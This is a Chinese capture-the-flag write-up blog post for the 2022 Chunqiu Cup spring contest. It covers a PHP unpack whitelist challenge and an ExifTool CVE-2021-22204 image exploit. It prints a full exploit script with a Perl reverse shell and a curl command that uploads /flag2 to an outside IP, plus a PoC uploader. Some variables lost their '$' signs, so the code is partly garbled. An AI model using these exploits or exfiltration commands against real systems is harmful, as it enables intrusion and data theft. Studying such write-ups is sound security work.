2022年春秋杯网络安全联赛春季赛勇者山峰

h0cksr

发布于 2023-05-17 10:30:15

5160

文章被收录于专栏：h0cksr的小屋h0cksr的小屋

2022年春秋杯网络安全联赛春季赛勇者山峰

easy_php

题目内容：pwner:我决定我要开始卷web了，我该怎么学呢？算了，先从基础的php开始学起吧。

index.php

 <?php
highlight_file(__FILE__);
error_reporting(0);
function createFolder(path)
{
    if (!file_exists(path)) {
        createFolder(dirname(path));
        mkdir(path, 0777);
    }
}

function savePostData()
{
    content =GLOBALS['HTTP_RAW_POST_DATA'];
    if (empty(content)) {content = file_get_contents('php://input');
    }
    if (content == null) {
        exit(0);
    }format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen';
    head = unpack("format", content);
    unset(format);
    format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen' . '/a' . (head["nFileNameLen"]) . 'chFileName' . '/a' . (head["nFileDataLen"]) . 'data';head = unpack("format",content);
    if (is_string(head["chFileName"])) {fileName = head["chFileName"];white_func = array("readfile","unserialize","phpinfo");
        if (!in_array(fileName,white_func)) {
            exit("hi hack!");
        }
        fileName(head["data"]);
    }
    echo "FAIL";
}
savePostData();
?>

得到构造相应的unpack数据的方法

<?php
function savePostData(fn,data)
{
    datalen=strlen(data);
    fnlen=strlen(fn);
    content=pack("l6a".fnlen."a".datalen,1,2,3,4,fnlen,datalen,fn,data);
    var_dump(urlencode(content),strlen(content));
}white_func = array("readfile","unserialize","phpinfo");
savePostData($white_func[2],'99999');

将得到的数据在burp的6进制页面逐个插入字符

很奇怪，在本地读取文件的readfile在本地测试可以正常输出文件，但是在题目里使用readfile并不能读出文件，不知道什么问题。。。

bash CVE-2021-22204.sh "system('ls -al /> /tmp/1')" poc2.jpg && python3 1.py 

bash CVE-2021-22204.sh "system('curl -F "file=@/flag2" 47.99.70.18:4444')" poc2.jpg && python3 1.py

一道python,名字叫啥不记得了

只出了exif漏洞的一半flag(/flag1)还有一半flag是convert漏洞的没做出来,网上下了很多POC都没反应(其实exif漏洞也是,最后找到下面这个可用脚本):

#!/bin/bash

RS='\033[0m'
R='\033[0;31m'
G='\033[0;32m'
LB='\033[1;34m'
CY='\033[0;36m'
W='\033[1;73m'

art=(base64 -d <<< "H4sIAFNGCWEA/52OMRLEIAwD+7xiy1Dxm6s8w0f8+KxyUFx7eGQhodgBVs4viy8ptz5Qx75gqoqSc2sLBtRLHcfLgX6TusTtmOLDbEytlQn3yCATW5/Sz6DVbizf2j7fVDPteiHX+0f5diM+5rLxz/MATvFQnxwBAAA=" | gunzip)
printf "{G}art{RS}"

# Check for params
if [ {#@} -lt 2  ]; then
    echo -e "\nUsage: ./CVE-2021-22204 cmd image.jpg"
    echo -e "Eg: ./CVE-2021-22204 \"system('id')\" kitten.jpg"    echo -e "Reverseshell: ./CVE-2021-22204 \"reverseme IP PORT\" image.jpg"
    exit
fi

# Check djvulibre is installed. 
if [(dpkg-query -W -f='{Status}' "djvulibre-bin" 2>/dev/null | grep -c "ok installed") -eq 0 ];then
    echo -e -n "\n{R}Warning:{RS} djvulibre-bin is not installed.\n"
    echo -e "{G}Confirm: {RS}"
    read -p  "Install djvulibre-bin now? (y/n):"confirm
    if [[{confirm} =~ ^([yY][eE][sS]|[yY])]]; then
        sudo apt-get install djvulibre-bin -y
    else
        exit
    fi
fi

# Create payload
echo -e "\nCreating payload"

cmd="1"

if [[ "{cmd:0:9}" = "reverseme" ]]; then
        ip=(echo "cmd"| cut -d"" -f 2)
        port=(echo "cmd"| cut -d"" -f 3)
        echo "IP:ip"
        echo "PORT: port"
cat <<EOF> payload
(metadata "\c\${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(port,inet_aton('ip')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")
EOF

else
cat <<EOF>payload
(metadata "\c\${1};")
EOF
fi

cat payload
echo -e "\n"

# Compress payload
bzz payload payload.bzz

# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

cat <<EOF> configfile
%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1; #end%
EOF

exiftool -config configfile '-HasselbladExif<=exploit.djvu' "2"
rm configfile payload.bzz payload exploit.djvu

echo -e -n "\n{G}Finished${RS}"

得到前半段flag的poc:

import os,sys
import threading
import requests

url="http://eci-2ze4iv6httpb9dlwbvru.cloudeci1.ichunqiu.com:8888"
session=requests.session()
# cmd=sys.argv[1]
# os.system(f"bash CVE-2021-22204.sh \"{cmd}\" poc2.jpg")
file=open("poc2.jpg","rb").read()
files = [
    ('file', ('curl4444.jpg', file, 'image/jpeg')),
]
print(session.post(url + "/upload", files=files).text)
print(session.get(url+"/info").text)
print(session.get(url+"/convert").text.split('"')[-2])

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2022-5-16 1，如有侵权请联系 cloudcommunity@tencent.com 删除

网络安全